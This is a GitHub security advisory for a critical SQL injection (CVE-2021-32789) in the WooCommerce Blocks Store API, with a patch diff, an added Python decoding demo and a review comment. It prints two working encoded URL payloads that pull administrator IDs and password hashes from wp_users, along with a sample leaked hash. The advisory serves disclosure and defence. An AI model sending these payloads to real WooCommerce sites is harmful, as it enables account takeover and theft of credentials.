This repository has been archived by the owner on Feb 23, 2024. It is now read-only.

Arbitrary SQL (SQL injection) possible via the Store API component.

Critical
nerrad published GHSA-6hq4-w6wv-8wrp Jul 23, 2021

Package

composer woocommerce/woocommerce-blocks (Composer)

Affected versions

>= 2.5.0

Patched versions

5.5.1, 5.4.1, 5.3.2, 5.2.1, 5.1.1, 5.0.1, 4.9.2, 4.8.1, 4.7.1, 4.6.1, 4.5.3, 4.4.3, 4.3.1, 4.2.1, 4.1.1, 4.0.1, 3.9.1, 3.8.1, 3.7.2, 3.6.1, 3.5.1, 3.4.1, 3.3.1, 3.2.1, 3.1.1, 3.0.1, 2.9.1, 2.8.1, 2.7.2, 2.6.2, 2.5.16

Description

Impact

This affects all WooCommerce sites running version 2.5.0 or later of the WooCommerce Blocks feature plugin. Via a carefully crafted URL, the Store API endpoint wc/store/products/collection-data can be made to run attacker-supplied SQL through its calculate_attribute_counts[][taxonomy] query parameter. The injected statement is read-only (the endpoint's own query is a SELECT, and the attacker appends a UNION to it), but as the two examples below show that is enough to read administrator user IDs and password hashes out of the database.

The SQL in each payload is percent-encoded several times over; decode it to read the statement.

  1. SQL formed to list the IDs of any administrator user (the injected UNION selects user_id from wp_usermeta rows whose meta_value contains "Administrator"):
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_id%252520FROM%252520wp_usermeta%252520WHERE%252520meta_value%252520LIKE%252520%252527%252525Administrator%252525%252527%25253b%252500
  2. User-specific query returning the matching wp_users row as id:user_login:user_email:user_pass, so the hashed password is included:
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500

Supporting Material/References:
Query 1 returns:

{"price_range":null,"attribute_counts":[{"term":0,"count":0},{"term":1,"count":1}],"rating_counts":null}

Query 2 returns:

{"price_range":null,"attribute_counts":[{"term":0,"count":0},{"term":"1:admin:**.com:$P$B.CZdnSLBmrCAURGHLO8pA2OoHdDoo0","count":1}],"rating_counts":null}

In both responses the injected row surfaces as the second attribute_counts entry. The UNION supplies two columns to match the term_count, term_count_id pair selected by the attribute-count query (see the patch below), so the constant 1 lands in count and the selected value (the user ID in query 1, the concatenated user row in query 2) lands in term.
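The two payloads decoded, and the string-building from ProductQueryFilters.php replayed before and after the patch, as an added Python example (not part of the advisory and not WooCommerce Blocks code). It assumes that three rounds of percent-decoding lie between the URL and the SQL string (PHP's query-string parsing plus the urldecode() calls inside wc_sanitize_taxonomy_name(); the advisory does not state this, it only shows triple-encoded payloads, and three decodes do yield plain SQL), it uses a simplified stand-in for esc_sql() that backslash-escapes what mysqli_real_escape_string() escapes, it does not emulate sanitize_title(), and its outside_string_literals() helper is a rough tokenizer written for this example rather than a SQL parser.

```python
"""Added example, not code from the advisory or from WooCommerce Blocks.

Decodes the reporter's two payloads and replays the string-building done in
src/StoreApi/Utilities/ProductQueryFilters.php before and after the patch,
to show where the SQL lands and why the added esc_sql() call stops it.
"""
from urllib.parse import unquote

# The two payloads exactly as they appear in the advisory (the value of the
# calculate_attribute_counts[][taxonomy] query parameter).
PAYLOAD_ADMIN_IDS = (
    "%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_id"
    "%252520FROM%252520wp_usermeta%252520WHERE%252520meta_value%252520LIKE"
    "%252520%252527%252525Administrator%252525%252527%25253b%252500"
)
PAYLOAD_USER_ROW = (
    "%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat"
    "%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C"
    "0x3a%25252Cuser_pass%252529from%252520wp_users%252520where%252520%252549"
    "%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"
)

# Assumption: three rounds of percent-decoding happen between the URL and the
# SQL string (PHP's query-string parsing plus the urldecode() calls inside
# wc_sanitize_taxonomy_name()). The advisory does not say so; it only shows
# triple-encoded payloads, and three decodes turn them into plain SQL.
DECODE_ROUNDS = 3


def decode_rounds(value: str, rounds: int = DECODE_ROUNDS) -> str:
    """Percent-decode a fixed number of times.

    Deliberately not "decode until nothing changes": the final text contains
    "%Administrator%", and one more pass would swallow "%Ad" as a hex escape.
    """
    for _ in range(rounds):
        value = unquote(value)
    return value


def esc_sql_like(value: str) -> str:
    """Simplified stand-in for WordPress esc_sql() (assumption: close enough
    for this demonstration). Backslash-escapes the characters that
    mysqli_real_escape_string() escapes; wpdb's handling of '%' is omitted."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\x00": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def taxonomy_in_clause(names):
    """Mirror of the concatenation in ProductQueryFilters.php:
    'AND term_taxonomy.taxonomy IN ("' . implode( '","', $names ) . '")'
    """
    return 'AND term_taxonomy.taxonomy IN ("' + '","'.join(names) + '")'


def clause_before_patch(raw_params):
    """Unpatched path: the decoded names go straight into the IN (...) list.
    sanitize_title() is not emulated (assumption: it leaves %xx sequences in
    place, otherwise the reporter's payloads could not have reached MySQL)."""
    return taxonomy_in_clause([decode_rounds(p) for p in raw_params])


def clause_after_patch(raw_params):
    """Patched path: the same, plus the esc_sql() step the diff adds."""
    return taxonomy_in_clause([esc_sql_like(decode_rounds(p)) for p in raw_params])


def outside_string_literals(sql: str) -> str:
    """Return the characters of `sql` that sit outside a single- or
    double-quoted MySQL string literal, honouring backslash escapes.
    A rough tokenizer written for this example, not a SQL parser."""
    out, quote, i = [], None, 0
    while i < len(sql):
        ch = sql[i]
        if quote is None:
            if ch in "\"'":
                quote = ch
            else:
                out.append(ch)
        elif ch == "\\":
            i += 1  # skip the escaped character
        elif ch == quote:
            quote = None
        i += 1
    return "".join(out)


if __name__ == "__main__":
    for label, payload in (("admin ids", PAYLOAD_ADMIN_IDS), ("user row", PAYLOAD_USER_ROW)):
        print(f"--- {label}")
        print("decoded SQL:", repr(decode_rounds(payload)))
        print("unpatched  :", outside_string_literals(clause_before_patch([payload])))
        print("patched    :", outside_string_literals(clause_after_patch([payload])))
```

Run it and the unpatched clause shows the UNION sitting outside any string literal, right after an empty IN (""), while the patched clause reduces to AND term_taxonomy.taxonomy IN () outside the literal: the injected quote is now \" and the rest of the payload is just an (unmatched) attribute name. A legitimate value such as pa_color passes through both paths unchanged.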

Patches

diff --git a/src/StoreApi/Utilities/ProductQueryFilters.php b/src/StoreApi/Utilities/ProductQueryFilters.php
index d8ebb765..bd3038ac 100644
--- a/src/StoreApi/Utilities/ProductQueryFilters.php
+++ b/src/StoreApi/Utilities/ProductQueryFilters.php
@@ -83,7 +83,13 @@ class ProductQueryFilters {
                        $attributes = array_map( 'wc_attribute_taxonomy_name_by_id', wp_parse_id_list( $attributes ) );
                }
   
-               $attributes_to_count     = array_map( 'wc_sanitize_taxonomy_name', $attributes );
+               $attributes_to_count     = array_map(
+                       function( $attribute ) {
+                               $attribute = wc_sanitize_taxonomy_name( $attribute );
+                               return esc_sql( $attribute );
+                       },
+                       $attributes
+               );
                $attributes_to_count_sql = 'AND term_taxonomy.taxonomy IN ("' . implode( '","', $attributes_to_count ) . '")';
                $attribute_count_sql     = "
                        SELECT COUNT( DISTINCT posts.ID ) as term_count, terms.term_id as term_count_id
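Review bot: the esc_sql() added in the array_map closure only neutralises quote characters, and its output is still concatenated into a hand-built IN ("...") list on the $attributes_to_count_sql line below; the stronger fix is to let $wpdb->prepare() quote the values with one %s placeholder per entry, for example `$wpdb->prepare( 'AND term_taxonomy.taxonomy IN (' . implode( ',', array_fill( 0, count( $attributes_to_count ), '%s' ) ) . ')', $attributes_to_count )`, or to drop any name that is not a registered attribute taxonomy before the query is assembled. The closure also needs a one-line comment stating that wc_sanitize_taxonomy_name() is not a SQL escape and that its result reaches the query verbatim, otherwise the esc_sql() call reads as redundant and invites removal in a later clean-up.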

Severity

Critical

CVE ID

CVE-2021-32789

Weaknesses